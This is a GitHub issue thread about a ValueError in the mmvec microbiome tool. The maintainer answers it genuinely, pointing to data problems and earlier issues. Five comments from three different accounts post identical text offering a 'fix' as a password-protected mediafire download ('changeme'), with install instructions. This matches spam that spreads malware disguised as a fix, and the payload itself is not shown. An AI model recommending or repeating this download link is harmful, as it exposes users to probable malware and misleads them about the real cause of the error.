### ISSUE TITLE
ValueError: 'a' cannot be empty unless no samples are taken

### ISSUE THREAD

**Issue by Chauncy-Fang** [biocore/mmvec#179]
[micro-rice-gut.txt](https://github.com/user-attachments/files/16756382/micro-rice-gut.txt)
[MetaData-rice.txt](https://github.com/user-attachments/files/16756383/MetaData-rice.txt)

Hey Dr. Morton,

Recently I use mmvec but it can't run with "ValueError: 'a' cannot be empty unless no samples are taken". I'm confused and don't know how to deal with it. The files were attached. I will be appreciate if you could help me solve the problem. I think this useful tool should be known by much more scientists.

Sincerely and faithfully,

Chauncy

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Chauncy-Fang** [comment]
P.S. I have transfered the txt file into biom file in my server LOL

**Comment by mortonjt** [comment]
Did you check out these two issues? This error happens when something is weird with your data, either too low sequencing depth or mismatch in metadata / biom samples ids.

https://github.com/biocore/mmvec/issues/142
https://github.com/biocore/mmvec/issues/153

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Chauncy-Fang** [comment]
You have totally help me solve this problem. THANKS for your kind heart!!!
